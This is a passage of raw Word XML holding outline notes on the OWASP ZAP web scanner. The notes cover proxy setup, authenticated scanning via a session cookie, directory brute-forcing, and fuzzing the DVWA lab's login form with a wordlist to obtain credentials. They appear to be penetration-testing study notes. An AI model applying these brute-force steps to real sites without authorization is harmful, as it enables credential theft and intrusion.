      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>HtmlUnity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> from the Ajax Spider Dropdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDA1BA2" w14:textId="02C2D8CF" w:rsidR="001E5CDE" w:rsidRPr="0084205E" w:rsidRDefault="001E5CDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Manual ZAP Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08041EB2" w14:textId="4836D29F" w:rsidR="001E5CDE" w:rsidRPr="0084205E" w:rsidRDefault="001E5CDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>using a proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3AEED5" w14:textId="5284008C" w:rsidR="001E5CDE" w:rsidRPr="0084205E" w:rsidRDefault="001E5CDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Tools &gt; Options &gt; Local Proxies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9C717F" w14:textId="6447B651" w:rsidR="00262D46" w:rsidRPr="0084205E" w:rsidRDefault="001E5CDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidR="00262D46" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2A26BB" w14:textId="62B1BDB9" w:rsidR="00262D46" w:rsidRPr="0084205E" w:rsidRDefault="00262D46" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Dynamic SSL Certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C85EE3" w14:textId="0BBEC37C" w:rsidR="00262D46" w:rsidRPr="0084205E" w:rsidRDefault="00262D46" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305E1722" w14:textId="06508B0D" w:rsidR="00262D46" w:rsidRPr="0084205E" w:rsidRDefault="00262D46" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Firefox Certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF329D8" w14:textId="38EF42B7" w:rsidR="00262D46" w:rsidRPr="0084205E" w:rsidRDefault="00262D46" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Import</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDF292B" w14:textId="160BAB41" w:rsidR="00262D46" w:rsidRPr="0084205E" w:rsidRDefault="00262D46" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Both Options &gt; OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B5A1C5" w14:textId="01B4EF19" w:rsidR="00262D46" w:rsidRPr="0084205E" w:rsidRDefault="00262D46" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154541E4" w14:textId="1C38262F" w:rsidR="00262D46" w:rsidRPr="0084205E" w:rsidRDefault="00262D46" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Manual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311D9EB0" w14:textId="0EBE32AD" w:rsidR="00262D46" w:rsidRPr="0084205E" w:rsidRDefault="00262D46" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>127.0.0.1 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AAC202" w14:textId="78A96764" w:rsidR="00262D46" w:rsidRPr="0084205E" w:rsidRDefault="00262D46" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Also use this proxy for FTP and HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F05CAB" w14:textId="3B4D1C38" w:rsidR="00262D46" w:rsidRPr="0084205E" w:rsidRDefault="00262D46" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Scanning an Authenticated Web Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18405834" w14:textId="68564AF2" w:rsidR="00262D46" w:rsidRPr="0084205E" w:rsidRDefault="00262D46" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Pass authentication token into ZAP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AA1E5B" w:rsidRPr="0084205E">
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AA1E5B" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> scan authenticated webpages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51861E40" w14:textId="2E4F305B" w:rsidR="00AA1E5B" w:rsidRPr="0084205E" w:rsidRDefault="00AA1E5B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Inspect Element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFECF61" w14:textId="4614BC6C" w:rsidR="00AA1E5B" w:rsidRPr="0084205E" w:rsidRDefault="00AA1E5B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Storage &gt; PHPSESSION Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248D45B7" w14:textId="6FBE6B99" w:rsidR="00AA1E5B" w:rsidRPr="0084205E" w:rsidRDefault="00AA1E5B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>In ZAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7732B2B5" w14:textId="0921239D" w:rsidR="00AA1E5B" w:rsidRPr="0084205E" w:rsidRDefault="00AA1E5B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>HTTP Sessions tab with new tab button</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575FF63B" w14:textId="3A812473" w:rsidR="00AA1E5B" w:rsidRPr="0084205E" w:rsidRDefault="00AA1E5B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>set authenticated session as active (right click)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07602A85" w14:textId="53B029B5" w:rsidR="00AA1E5B" w:rsidRPr="0084205E" w:rsidRDefault="00AA1E5B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Brute-Force Directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEE7AFB" w14:textId="65B75321" w:rsidR="00AA1E5B" w:rsidRPr="0084205E" w:rsidRDefault="00AA1E5B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>use wordlist attack and directory brute-force through ZAP (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FCF41A" w14:textId="59D10E41" w:rsidR="00450689" w:rsidRPr="0084205E" w:rsidRDefault="00450689" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Tools &gt; Options &gt; Forced Browse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441CCBF3" w14:textId="70B2E7B2" w:rsidR="00450689" w:rsidRPr="0084205E" w:rsidRDefault="00450689" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Add Custom Forced Browse File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6F7D7F" w14:textId="07A88D80" w:rsidR="00450689" w:rsidRPr="0084205E" w:rsidRDefault="00450689" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Right-click website &gt; Attack &gt; Forced Browse Site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684911E8" w14:textId="76C59C3D" w:rsidR="00450689" w:rsidRPr="0084205E" w:rsidRDefault="00450689" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Brute-Force Web Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1607B76A" w14:textId="68D57918" w:rsidR="00450689" w:rsidRPr="0084205E" w:rsidRDefault="00450689" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>brute-force a form to get credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609383F4" w14:textId="5E692F81" w:rsidR="008B358F" w:rsidRPr="0084205E" w:rsidRDefault="008B358F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>navigate to Brute Force page on DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045060CD" w14:textId="238EDED7" w:rsidR="008B358F" w:rsidRPr="0084205E" w:rsidRDefault="008B358F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>attempt login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B07B566" w14:textId="4E4E70F2" w:rsidR="008B358F" w:rsidRPr="0084205E" w:rsidRDefault="008B358F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>vulnerabilities folder under Sites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324FCB0F" w14:textId="6D682754" w:rsidR="008B358F" w:rsidRPr="0084205E" w:rsidRDefault="008B358F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>GET:brute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Login,password,username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB9B85A" w14:textId="1B0C3A76" w:rsidR="008B358F" w:rsidRPr="0084205E" w:rsidRDefault="008B358F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>right-click &gt; Attack &gt; Fuzz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2B831B" w14:textId="03833F44" w:rsidR="008B358F" w:rsidRPr="0084205E" w:rsidRDefault="008B358F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>highlight password attempted and add wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1EBAE4" w14:textId="3DADD4A3" w:rsidR="008B358F" w:rsidRPr="0084205E" w:rsidRDefault="008B358F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>fuzzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50C3401D" w14:textId="79EE68CD" w:rsidR="008B358F" w:rsidRPr="0084205E" w:rsidRDefault="008B358F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">sort </w:t>
      </w:r>
      <w:r w:rsidR="00F0417E" w:rsidRPr="0084205E">
        <w:t>State</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> tab to Reflected first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A37846C" w14:textId="7ACA3957" w:rsidR="00F0417E" w:rsidRPr="0084205E" w:rsidRDefault="00F0417E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ZAP Extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B06AE06" w14:textId="78CD9507" w:rsidR="00F0417E" w:rsidRPr="0084205E" w:rsidRDefault="008159D6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Python Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DB21B0" w14:textId="3890DA50" w:rsidR="008159D6" w:rsidRPr="0084205E" w:rsidRDefault="008159D6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Community Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2814054F" w14:textId="580AC165" w:rsidR="008159D6" w:rsidRPr="0084205E" w:rsidRDefault="008159D6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Tools &gt; Options &gt; Passive Scanner &gt; Scan Messages Only in Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAA3482" w14:textId="0A33F64A" w:rsidR="008159D6" w:rsidRPr="0084205E" w:rsidRDefault="008159D6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067C2584" w14:textId="525FA9F7" w:rsidR="008159D6" w:rsidRPr="0084205E" w:rsidRDefault="008159D6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hunt.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B084F9C" w14:textId="3A4676E4" w:rsidR="008159D6" w:rsidRPr="0084205E" w:rsidRDefault="008159D6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>right-click</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4BEB49" w14:textId="4475B2E9" w:rsidR="008159D6" w:rsidRPr="0084205E" w:rsidRDefault="008159D6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>enable and save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725D766C" w14:textId="5082C27C" w:rsidR="008159D6" w:rsidRPr="0084205E" w:rsidRDefault="008159D6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436C0163" w14:textId="7308B097" w:rsidR="008159D6" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId58" w:history="1">
        <w:r w:rsidR="008159D6" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.zaproxy.org/docs/desktop/ui/</w:t>
